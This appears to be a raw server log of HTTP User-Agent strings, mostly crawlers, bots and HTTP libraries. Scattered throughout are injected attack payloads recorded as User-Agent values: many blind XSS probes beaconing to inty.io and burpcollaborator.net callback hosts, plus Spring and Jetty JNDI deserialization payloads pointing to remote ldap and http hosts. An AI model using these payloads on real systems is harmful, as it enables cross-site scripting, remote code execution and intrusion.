http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528122064-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531072152-0 +Python-httplib2/0.10.3 (gzip) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1527090338-0 +WordPress/4.9.2; http://kenobi/www.aurigaspa.com/wordpress +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-80@moz.com) +WordPress/4.9.7; http://ef.byd.pt +WhatsApp/2.18.153 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530716940-0 +Mozilla/5.0 (compatible; online-webceo-bot/1.0; http://online.webceo.com) +Google-Cloud-ML-Vision +WordPress/4.7.10; http://tim3.pt +WordPress/4.9.5; http://www.imigrantes.pt +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/aq439imqdx2g3rpiva89flk54waz0nseg93zro\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/x202ne206vn9dor15p8zm0278yez7nzen9azyo\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.8; https://www.lostugas.com +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/le3exta118qrr2dtjlwk3w8gs7y7pvhm5hs7gw\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/q7yvs77tbos2ihwuaidsrt70drjoncf33yqoed\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.132 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/s4xln008rfgyh9309smrt3ynieohr5jw7ruhi6\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.8; https://x1online.com +Mozilla/5.0 (compatible; special_archiver/3.3.0 bot@archive.org https://archive.org/details/archive.org_bot) +GuzzleHttp/6.2.1 curl/7.35.0 PHP/5.6.30-12~ubuntu14.04.1 deb.sury.org 1 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1532410187-0 +<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://an11qgd7ajoeubdrgi1q9u0i59b3421qq.b.inty.io/</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://an11qgd7ajoeubdrgi1q9u0i59b3421qq.b.inty.io/</shareable-resource></bean-factory></x> +python-requests/2.2.1 CPython/3.4.3 Linux/3.16.0-33-generic +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523631800-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533484585-0 +WhatsApp/2.18.261 A +WordPress/4.5.13; http://koshien.biz +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534249302-0 +WordPress/4.5.12; http://getpdffrompaisley.ga +WordPress/4.8; https://www.cultuga.com.br +WordPress.com; https://diogoegisele.wordpress.com +WhatsApp/0.3.419 N +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534798870-0 +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.1; MSIE 9.11.9600.18860) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ob3zegtjd7n47bhajjiejlw10s6quil6gt6hv\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529960491-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/of7t05frjm00qf4siglqzrfylprho5gw4rrhf6\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531154522-0 +WordPress/4.9.7; https://www.atlaslisboa.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523956916-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/e1gjmv1h5cmqc5qi467glh1o7fdcf07rvmic61\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.5; http://thetheatretimes.com +WhatsApp/2.18.157 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/cp5hatpftaao03egs4ve9fpmvd16vunlbgy6mv\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524708214-0 +WhatsApp/2.17.50 i +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531916031-0 +WhatsApp/2.18.96 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 PTST/171129.171147 +Apache-HttpClient/4.5.2 (Java/1.8.0_191) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.51 (KHTML, like Gecko; Google Web Preview) Chrome/12.0.742 Safari/534.51 +(Android 5.0.1; GT-I9505 Build) PubNub-Java/Android/ +(Android 8.1.0; INE-LX1 Build) PubNub-Java/Android/ +(Android 8.0.0; SM-G950F Build) PubNub-Java/Android/ +SBL-BOT (http://sbl.net) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/2wzvfasijp889jva12e1ldqxaoggd45vtqgg45\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.7; https://www.acoesdaeuronext.com +WordPress/4.9.8; https://creditos-portugal.com +WordPress/4.9.4; http://www.bancosdeportugal.info +WhatsApp/2.18.31.32 CFNetwork/894 Darwin/17.4.0 +python-requests/2.18.2 AppEngine-Google; ( http://code.google.com/appengine; appid: s~voilanorbert-1272) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1532097217-0 +WhatsApp/2.18.13 A +WhatsApp/2.18.202 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/503alm0843lhbwp93x67k80f66c73vvmjh67uw\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.7.0 CPython/2.7.12 Linux/3.13.0-139-generic +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530808300-0 +Mozilla/4.0 (compatible; Vagabondo/4.0; http://webagent.wise-guys.nl/) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/1329mn6sdqgp57etchym1mk8vz1tplg9bw1kq\.burpcollaborator.net/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ftcqw7bavy5vp2z11a051cesijoanyfp3kqaez\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ujh5mm1pldvafhpgrpqkrr478yerjfb6z1mrag\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/jsfcbrozf64p50rrxjaihume65c42sujie54tt\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/qhbj0yd64dtwu7gymqzp61blvc1du1msanxdl2\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-862.14.4.el7.x86_64 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko; Google Page Speed Insights) Chrome/22.0.1229 Safari/537.4 +RyteBot/1.0.0 (+https://bot.ryte.com/) +Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua) +newspaper/0.2.8 +Anonymous +Mozilla/5.0 (compatible; Google-Apps-Script) +python-requests/2.20.1 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/yoqr76kebl041fn6ty6xd9it2k8k28uziu5kt9\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.120 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534249301-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xcd2xec0gvx9no11fpizw0c7iyovjjbaz5mvak\.b.inty.io/).replace(/\\/g,[]))//'> +GoogleEarth/7.3.1.4507(Windows;Microsoft Windows (6.2.9200.0);pt-PT;kml:2.2;client:Pro;type:default) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180628.130629 +WhatsApp/0.2.8361 N +curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1l zlib/1.2.3 libidn/1.18 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530897733-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0 glindahl-cocrawler/0.1.5.dev334 g2e14075.d20180127 ( http://www.pbm.com/~lindahl/glindahl-cocrawler.html) +WhatsApp/2.18.233 A +Mozilla/5.0 (compatible; MSIE 9.0; Windows) AppEngine-Google; (+http://code.google.com/appengine; appid: s~unmask-parasites2) +GoogleEarth/7.3.1.4507(Windows;Microsoft Windows (6.2.9200.0);pt;kml:2.2;client:Pro;type:default) +WordPress/4.9.2; https://www.eurodicas.com.br +NetNewsWire/2.x (Mac OS X; http://ranchero.com/netnewswire/) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/180313.180300 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531732931-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/b9l4sj5rwylhms8jebraym36nxtzwnoec9zzno\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/jrecarnze63p40qrwj9igule55b49s1jpec40t\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/6dkbynd9h4yiox2agyj8x9dgj7p4usmjaex4lt\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html); yaka +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.2743.82 Safari/537.36 AppEngine-Google; ( http://code.google.com/appengine; appid: s~csp-evaluator) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/lujqf2uoyjfx5cjpxd0neouv0m6m9a11pwcm0b\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/z554qg529xqbgqu38rb1p259b0h57tzknfa5yu\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; archive.org_bot; Archive-It; http://archive-it.org/files/site-owners.html) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525098822-0 +PycURL/7.43.0 libcurl/7.55.1 WinSSL zlib/1.2.11 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530805933-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/p3timxz5qcfvg62x8plos0xkhbn8lwdn1io8cx\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/6.0 (compatible; MSIE 7.01; Amiga-AWeb) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1532903457-0 +GuzzleHttp/6.3.3 curl/7.29.0 PHP/7.0.27 +WordPress/4.9.7; http://clubemoraremportugal.rf.gd +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 6.0.1; vivo_1610 ) U2/1.0.0 Mobile +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ig2n1zglkg1ur95mjamk0lgsmjsnobg24xrnfc\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729) PTST/402 +Python/3.6 aiohttp/2.3.9 +Mozilla/3.0 (compatible; WebCapture 2.0; Windows) +LinkedInBot/1.0 (compatible; Mozilla/5.0; Apache-HttpClient http://www.linkedin.com) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530013116-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535742658-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524985952-0 +WordPress/4.7.4; http://www.jornaleconomico.sapo.pt +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/u94zub9xdsu6klyycmfwtx94fvltmhe823ptdi\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531154523-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0 glindahl-cocrawler/0.1.5.dev228 g0e18acb ( http://www.pbm.com/~lindahl/glindahl-cocrawler.html) +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.1; MSIE 9.11.9600.18376) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525434401-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Like-Version/6.0 Safari/3604.4.7.1.6 webkit2png/0.7 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; en-us) AppleWebKit/525.18 (KHTML, like Gecko) NetNewsWire/3.1.7 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/tpmm81l9cg1z2ao1ut7se4jo3f9f43wukp7fv4\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525524216-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/qgav17gtko12rh5ujims0tg0mrsujib9z4muaj\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.3.17; http://braincounts.pt/website +[!!org.eclipse.jetty.plus.jndi.Resource ["__/obj", !!javax.naming.Reference ["foo", "Freddy", "http://4ejvha411df8l54l7csk0orcw32xwnobd.b.inty.io/"]], !!org.eclipse.jetty.plus.jndi.Resource ["obj/test", !!java.lang.Object []]] +WordPress/4.9.2; http://juntandolecomcre.com +Guzzle/5.3.1 curl/7.56.1 PHP/7.1.11 +AppEngine-Google; ( http://code.google.com/appengine; appid: s~wixprivatemedia) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605045-0 +trumind-crawler/Nutch-1.13 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/le3qz2eoijzxpc3phdknyoevkmqkl8dz1uokc9\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/yegrx6ae1lq4rfd6jywx398tskyhs5kw8rvhj6\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.8.3; https://www.eurocheapo.com/blog +Linguee Bot (http://www.linguee.com/bot; bot@linguee.com) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1532963652-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/sgclz0c83fsyt9f0lsyr53anue0d21usin5dt2\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.8; http://bomdia.lu +WhatsApp/2.18.244 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530808298-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/9oye9qocs79lz0ddr1ub8cojua0c50xrlm8cw1\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/e0fjlv0h4clqb5pi366gkh0o6fc6eu6lugh65v\.b.inty.io/).replace(/\\/g,[]))//'> +curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/cfv5ykbs2zristekkcxb4n97tyz14pwgkb71vq\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.6; https://eco.pt +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/8kt13ggo7vwexpjgp8279je3yu4s3gv7j26suh\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/1z16kiz43zkdaso52t53j4zb52bt7hz8n3atyi\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535990406-0 +WordPress/4.9.4; http://criticalconcrete.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536672629-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535037649-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/byd4hjurlyahbsxj3bganms6cxizhn9ex9kz8o\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Mobile Safari/537.36 (compatible; Googlebot/2.1; http://www.google.com/bot.html) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/mg6fzuc239sst3fulmyl5xahu80b2zuqil5bt0\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/9mwe7qmcq77lx0bdp1sb6cmjsaya2yupik5atz\.b.inty.io/).replace(/\\/g,[]))//'> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-53@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/6krz3egm7twcxnjep6259he1ys4o9c13pyco0d\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 PTST/180111.190127 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171103.151138 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531826296-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529661607-0 +WhatsApp/2.17.370 A +NetSurf/3.8 (Linux) +YOURLS v1.7.1 +http://yourls.org/ (running on http://fund.school) +YOURLS v1.5 +http://yourls.org/ (running on http://s.qurdo.com) +YOURLS v1.7.2 +http://yourls.org/ (running on http://xsle.net) +YOURLS v1.7.2 +http://yourls.org/ (running on https://1borsa.com) +YOURLS v1.7.2 +http://yourls.org/ (running on https://bogazicitente.com) +YOURLS v1.7.2 +http://yourls.org/ (running on https://onlineuniversalwork.com) +YOURLS v1.7.2 +http://yourls.org/ (running on https://jtbtigers.com) +YOURLS v1.7.2 +http://yourls.org/ (running on https://darknesstr.com) +YOURLS v1.7.2 +http://yourls.org/ (running on https://ecuadortenisclub.com) +YOURLS v1.7.2 +http://yourls.org/ (running on https://slimex365.com) +Embed PHP library +LWP::Simple/5.827 libwww-perl/5.834 +Screaming Frog SEO Spider/10.4 +httpunit/1.5 +PHP (www.t0psites.com), hosted by www.ukraine.com.ua +asynchttp +Iframely/1.2.7 (+http://iframely.com/;) +Mozilla/5.0 (compatible; AndersPinkBot/1.0; +http://anderspink.com/bot.html) +Browsershots +Mozilla/5.0 (compatible; MJ12bot/v1.4.2; http://www.majestic12.co.uk/bot.php?+) +okhttp/3.8.0 +PHP/5.4.45 +PHP/5.2.12 +curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2 +YOURLS v1.7.2 +http://yourls.org/ (running on http://freeurlredirect.com) +Mozilla/5.0 (compatible; publiclibraryarchive.org/1.0; +crawl@publiclibraryarchive.org) +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 PTST/254 +python-requests/2.21.0 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 PTST/253 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5 AppEngine-Google; (+http://code.google.com/appengine; appid: s~akibadaili1) +Mozilla/5.0 (Windows NT 5.2; U; en) Opera 8.01 AppEngine-Google; (+http://code.google.com/appengine; appid: s~zwdant03) +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 AppEngine-Google; (+http://code.google.com/appengine; appid: s~cehnwie05) +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.14 (KHTML, like Gecko) JavaFX/2.2 Safari/535.14 +bitlybot +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36 PTST/251 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 PTST/251 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.8 (KHTML, like Gecko; Google Web Preview) Chrome/19.0.1084.36 Safari/536.8 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 AppEngine-Google; (+http://code.google.com/appengine; appid: s~brave-octane-117209) +Mozilla/5.0 (compatible; heritrix/1.14.4 +http://www.exif-search.com) +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 PTST/254 +Mozilla/5.0 (compatible; Nigma.ru/3.0; crawler@nigma.ru) +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~gv78xiu03) +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 PTST/257 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.14 (KHTML, like Gecko) JavaFX/2.2 Safari/535.14 +Mozilla/5.0 (Windows NT 6.2; U; en) Opera 8.01 AppEngine-Google; (+http://code.google.com/appengine; appid: s~zwdant03) +Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/) +Mozilla/5.0 (Windows NT 5.0) AppleWebKit/535.14 (KHTML, like Gecko) JavaFX/2.2 Safari/535.14 +Mozilla/5.0 (Randomized by FreeSafeIP.com/upgrade-to-remove; compatible; MSIE 9.0; Windows NT 5.0WOW64) Chrome/19.0.1229.79 +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.14 (KHTML, like Gecko) JavaFX/2.2 Safari/535.14 +Mozilla/5.0 (compatible; YandexVideoParser/1.0; +http://yandex.com/bots) +Java/1.7.0_04 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Search Console) Chrome/27.0.1453 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 PTST/124 +curl/7.16.4 (x86_64-pc-linux-gnu) libcurl/7.16.4 OpenSSL/0.9.8o zlib/1.2.3 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.8 (KHTML, like Gecko; Google Page Speed Insights) Chrome/19.0.1084.36 Safari/536.8 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; PTST 2.385) +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 PTST/253 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36 PTST/247 +curl/7.63.0 +Ubuntu APT-HTTP/1.3 +Faraday v0.15.4 +Mozilla/5.0 (compatible; Googlebot/2.1 +NetSurf/3.2 (Linux) +Mozilla/2.0 (compatible; Ask Jeeves/Teoma) +lua-resty-http/0.07 (Lua) ngx_lua/10000 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~uswj206) +okhttp/2.4.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Site-Shot/2.1 (http://www.site-shot.com/) Safari/534.34 +Scrapy/1.5.2 (+https://scrapy.org) +Apache-HttpClient/4.5.2 (Java/1.8.0_201) +python-requests/2.7.0 CPython/2.7.3 Linux/3.13.0-117-generic +LWP::Simple/5.64 +Mozilla/5.0 (compatible; AhrefsBot/6.1; News; +http://ahrefs.com/robot/) +Mozilla/5.0 (compatible; ZumBot/1.0; http://help.zum.com/inquiry) +SiteSucker/2.4.6 +httpunit/1.x +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 (compatible; PPBot/2.1; +https://pagepeeker.com/robots/) +Java/1.8.0_201 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/190208.150247 +Microsoft BITS/ +Scrapy/1.6.0 (+https://scrapy.org) +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.10.1.el7.x86_64 +HubSpot Marketing Grader, HubSpot Marketing Grader +FAST-WebCrawler/3.6 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp) +FAST-WebCrawler/3.7 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp) +Java/1.8.0_212 +Python/3.6 aiohttp/3.5.4 +Jersey/2.12 (HttpUrlConnection 1.8.0_131) +Screaming Frog SEO Spider/11.2 +python-requests/2.22.0 +Apache-HttpClient/4.5.5 (Java/9.0.1) +Apache-HttpClient/4.5.7 (Java/11.0.2) +ApacheBench/2.3 +python-urllib 